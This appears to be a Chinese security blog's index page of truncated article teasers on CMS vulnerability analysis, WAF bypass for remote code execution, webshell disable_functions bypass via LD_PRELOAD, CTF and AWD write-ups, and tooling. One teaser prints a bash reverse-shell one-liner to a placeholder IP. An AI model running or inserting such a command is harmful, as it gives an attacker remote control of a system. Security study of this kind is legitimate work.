0x00 cms简介 云EC电商系统是由一套基于PHP+MYSQL开源的、免费的电商系统软件。支付整合了支付宝三端支付（PC、手机、APP），微信三端支付（PC扫码、微信公众号、APP），银联支付。 模块化设计...

author：waitalone 1.bash版本 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 1 bash -i >& /dev/tcp/10.0.0.1/8...

由于换了Mac，因此原来windows下的mysql监控小软件不能再用，只能自己造个轮子，下午抽空写了个监控脚本，代码不是很复杂，供有需要的人阅读参考，也可以根据下面再做定制 环境（Python 2.7） ...

这个库主要是配合neo4j图数据库来使用的python第三方库，最近在做图数据库，自然而然就需要py2neo库来对图数据库里的数据做处理，此篇文章主要是对py2neo的使用做一个简单的说明，虽然网上有很...

0x00 前记 这里的漏洞分析只挑选了两个觉得有新意的点来说，整个cms肯定还是有很多漏洞，可以说是值得练手的一款cms，并且由于是根据某付费cms二次制作完成，因此市面上这类汽车网源码肯定也是...

最近稍微有点空闲，就想去好好研究下智能合约的安全问题，因为是新兴产业，所以没有现成的教程或者是材料，所以只能找一些较为基础但是能够帮助我们学习智能合约的平台，这里的Ethernaut就是一...

前言 如今市面上的WAF几乎都已经具备了针对RCE攻击的防御能力，这些WAF并不是想象中毫无破绽，当Web服务器是Linux平台时我们就可以利用一些技巧来绕过WAF规则集。本文主要总结Linux平台下针对RC...

比赛有点久远了，大概是9月份举行的，全名叫2018年江苏省网络空间安全保密知识技能大赛，比赛流程是整个上午为awd，下午为靶场渗透。 上午awd打的比较出色，总分是第一，并且保持了0失分，记下...

最近参与到一个漏扫项目当中，针对nessus和openvas比对后，发现基于openvas开发的扫描器更有优势，主要体现在openvas的命令行可以直接添加扫描ip、扫描方式和最后的报告导出，这就会帮助开发公...

摘要：千辛万苦拿到的 webshell 居然无法执行系统命令，怀疑服务端 disable_functions 禁用了命令执行函数，通过环境变量 LD_PRELOAD 劫持系统函数，却又发现目标根本没安装 sendmail，无法执行...